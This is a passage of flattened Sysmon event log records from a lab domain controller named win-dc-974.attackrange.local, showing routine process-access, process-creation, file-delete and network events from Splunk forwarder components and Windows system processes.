Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.623{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E5F-603E-0AAB-00000000AD01}11952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.625{05ADC7E1-6E5F-603E-0AAB-00000000AD01}11952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002245270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.358{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A3242F09FE73104B0FCC101307FBD20,SHA256=132CBA7D43E9529F1C3E6A079DDF5EFC7007C43C1FB2530D8C5EAC56C2B6ABB0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:52.393{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60206-false10.0.1.12-8000- 10341000x80000000000000002245298Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.936{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E60-603E-0CAB-00000000AD01}13260C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245297Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.936{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245296Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.936{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245295Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.936{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245294Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.936{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.936{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6E60-603E-0CAB-00000000AD01}13260C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.936{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E60-603E-0CAB-00000000AD01}13260C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.937{05ADC7E1-6E60-603E-0CAB-00000000AD01}13260C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002245290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.467{05ADC7E1-6E60-603E-0BAB-00000000AD01}1507214912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.385{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A134EBC875478186F345B94DA44C80DF,SHA256=10C0169C43D215BECDAF1A1A5152C8CBC58327C42654160295D6CAB9FD2C12D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.264{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E60-603E-0BAB-00000000AD01}15072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245287Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.264{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245286Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.264{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245285Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.264{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.264{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.264{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6E60-603E-0BAB-00000000AD01}15072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.264{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E60-603E-0BAB-00000000AD01}15072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:04.266{05ADC7E1-6E60-603E-0BAB-00000000AD01}15072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002245280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.999{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=896BD195920B4DF2369DECB822884977,SHA256=F349BD340EDB50D7205D3C3BAF8FC5455B15EF98A67504E85B333A4D5EC8A086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245301Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:05.420{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ACFBA3B3F0807E56E80271174D88077,SHA256=D632008709FA0762A34C848F2A00AED406F0650DC06A8032623BDB3795F05D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245300Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:05.295{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD808434AAF2B39F8EC855EB8265F334,SHA256=6158875591B74A66010EACC9240D1B6661FB8686BEE90B07FE151C0F10DFD106,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245299Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:05.139{05ADC7E1-6E60-603E-0CAB-00000000AD01}132606272C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245304Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:06.436{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5F17D1252131B4F32BB7496DBDC0957,SHA256=7CA5F19315A84E188882B78AF8A7BA409EF50557FD492536D3F7C7FB21C53D3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245303Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:06.436{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7785E09A75258F9B27F436099EFD75C5,SHA256=600E4475948F275C36A0F091FF45C70C27D1F82DFC3542A6E10C0A93F7111C66,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245302Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:55.548{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local51301- 23542300x80000000000000002245306Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:07.452{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D7AC10BFA5CC2818A6CCB55D373FECE,SHA256=3500D45AC80F07F5E94E7F4B5FD355EDC3D88EA5E80B6BC1F31FA897E93D2438,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245305Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:56.564{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local51301- 23542300x80000000000000002245309Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:08.485{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1C54B0C06DCDE3306A4022A909B72B8,SHA256=39BB9275F5506B8235D8C42B16497E9D0B702750EB5FB030DA295A46749A3B29,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245308Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:58.252{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60207-false10.0.1.12-8000- 23542300x80000000000000002245307Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:08.155{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=733602DDCD712FFA56D7B8F071A3D877,SHA256=409D626D87187F2E306DAD45A9FFEACF276C19EC7135988F2D44EAD71B282A8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245310Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:09.499{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=753EB2FF1F1788D00E2DEB625F833EE4,SHA256=C4DA34CB3DFF620754E6BF82A4AD9469D9E0D15BA12976B69D07589FD5B38436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:10.514{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program 